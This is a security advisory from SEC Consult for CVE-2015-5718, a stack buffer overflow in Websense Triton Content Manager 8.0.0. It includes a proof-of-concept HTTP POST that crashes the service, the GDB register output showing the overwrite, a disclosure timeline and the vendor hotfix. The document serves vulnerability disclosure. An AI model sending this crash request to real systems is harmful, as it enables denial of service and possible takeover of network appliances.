Websense Triton Content Manager 8.0.0 Build 1165 Buffer Overflow

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory < 20150805-0 >  
=======================================================================  
title: Stack buffer overflow in handle_debug_network  
product: Websense Triton Content Manager  
vulnerable version: 8.0.0 build 1165  
fixed version: V8.0.0 HF02  
CVE number: CVE-2015-5718  
impact: high  
homepage: www.websense.com  
found: 2015-04-13  
by: C. Schwarz (Office Bangkok)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore  
Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
- -------------------  
Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web  
proxy and cache that provides real-time content scanning and Web site classification  
to protect network computers from malicious Web content while controlling employee  
access to dynamic, user-generated Web 2.0 content. Web content has evolved from a  
static information source to a sophisticated platform for 2-way communications,  
which can be a valuable productivity tool when adequately secured.  
  
URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx  
  
  
Business recommendation:  
- ------------------------  
Attackers are able to completely compromise the Websense Content Manager with  
combined targeted attack vectors.  
  
The scope of the test, where the vulnerabilities have been identified, was a  
very short crash-test of the application. It is assumed that further  
vulnerabilities exist within this product.  
  
  
Vulnerability overview/description:  
- -----------------------------------  
A stack-based buffer overflow was identified in the Websense Content Manager  
administrative interface, which allows to write past the 512 bytes sized buffer  
"dest" when calling "strcpy" in "handle_debug_network". The vulnerability can be  
used in combination with a CSRF attack to crash the system or execute arbitrary  
code.  
  
  
Proof of concept:  
- -----------------  
A single HTTP request is sufficient to crash the content_manager binary application:  
  
POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1  
Host: <content gateway>:8081  
[...]  
Content-Length: 869  
  
record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply  
  
Below is the GDB output of the process memory, most of the CPU's registers including  
the stack pointer of various previous frames are overwritten with the value of 'A'.  
  
Program received signal SIGSEGV, Segmentation fault.  
[Switching to Thread 0x7f122b073700 (LWP 50174)]  
0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>,  
arg=<value optimized out>) at  
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997  
997 /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such  
file or directory.  
in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc  
(gdb) i r  
rax 0x0 0  
rbx 0x4141414141414141 4702111234474983745  
rcx 0x125c0 75200  
rdx 0xda3f 55871  
rsi 0x3541360 55841632  
rdi 0x1 1  
rbp 0x4141414141414141 0x4141414141414141  
rsp 0x7f122b070618 0x7f122b070618  
r8 0x4141414141414141 4702111234474983745  
r9 0x4141414141414141 4702111234474983745  
r10 0x4141414141414141 4702111234474983745  
r11 0x3f2c35a350 271324652368  
r12 0x4141414141414141 4702111234474983745  
r13 0x4141414141414141 4702111234474983745  
r14 0x4141414141414141 4702111234474983745  
r15 0x4141414141414141 4702111234474983745  
rip 0x6becb1 0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>  
eflags 0x10206 [ PF IF RF ]  
cs 0x33 51  
ss 0x2b 43  
ds 0x0 0  
es 0x0 0  
fs 0x0 0  
gs 0x0 0  
(gdb) bt  
#0 0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized  
out>, arg=<value optimized out>) at  
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997  
#1 0x4141414141414141 in ?? ()  
#2 0x4141414141414141 in ?? ()  
#3 0x4141414141414141 in ?? ()  
#4 0x4141414141414141 in ?? ()  
#5 0x4141414141414141 in ?? ()  
#6 0x4141414141414141 in ?? ()  
#7 0x4141414141414141 in ?? ()  
#8 0x4141414141414141 in ?? ()  
#9 0x4141414141414141 in ?? ()  
#10 0x4141414141414141 in ?? ()  
#11 0x4141414141414141 in ?? ()  
#12 0x4141414141414141 in ?? ()  
#13 0x4141414141414141 in ?? ()  
#14 0x4141414141414141 in ?? ()  
#15 0x4141414141414141 in ?? ()  
#16 0x4141414141414141 in ?? ()  
#17 0x0000000000000000 in ?? ()  
(gdb)  
  
  
Vulnerable / tested versions:  
- -----------------------------  
Websense Triton Content Manager 8.0.0 build 1165  
  
  
Vendor contact timeline:  
- ------------------------  
2015-05-18: Contacting vendor  
2015-06-02: established secure communication channel  
2015-06-03: sending advisory draft  
2015-06-24: requesting update from vendor  
2015-07-16: requesting update from vendor  
2015-07-20: requesting update from vendor  
2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10  
2015-08-05: Public advisory release  
  
  
Solution:  
- ---------  
The vulnerability has beed fixed in hotfix V8.0.0 HF02.  
http://www.websense.com/support/article/kbarticle/v8-0-0-About-Hotfix-02-for-Websense-Content-Gateway  
  
  
Workaround:  
- -----------  
No workaround available.  
  
  
Advisory URL:  
- -------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Christoph Schwarz / @2015  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iQIcBAEBAgAGBQJVwedZAAoJEC0t17XG7og/fioP/2G7YOKdO6fBaT2GQdYaZvTO  
V/o+Ticavuc/eyBIUx+la9YPl0lC4ty5kJzh2E8P3Xpucqq5vMB/nQg1V9cmTsr2  
hRGKX7n3XdJXjiWMk6i+0XIjIlYBCHKT+Q05rEUnmZzCfvB6iu5J3WYlyW7QH3Bu  
ME/WhlsG5fBTiDjjOiuFeZB1rsaZxqNGtspwRwnrXH3HZyze74S8x7ZWG68q2v9a  
eBUndHye9DGzwHtY5QmmqUJeTq4tX6bNb8KYMoZC/0FNNhUglkRKyQVVY5uuLJya  
4ZAvtuKZCDLGap4ZSQSweZ7h9zY3vaiYfyHijqfZ6qkbWbiZSv5WyomdVF4xrZzT  
n00yBtGF2kmxDmvUYj5IZGrDKlRui1lpgtPXCuVstuYOC6/R4ZiJy+pL0MMc9C7M  
tnOKM9yl3PuZRqIPoXPzn3NOKlHWzZHgmNdaOJSxt9/slEZb69De7FwXV/GfbYsS  
hax0PF29a5NlssxQep5GH1zNTRXmoUtsnECwYnMm309M8ulM1xtNeMZbo2D66zY8  
v16L0DlKLh86fmdW5G3em7YHUMrV3PCj605BLsi4rmNDfPJpNIgj+Vq1M94OcNJW  
DtJk0hQlfRI+BtScIpLmMHCqHc6vNsVZKbVwbev3QYq3ACNEguALS1UQ21AbUIBE  
OidnDK17YDsYh6mkkvc2  
=FaSJ  
-----END PGP SIGNATURE-----  
`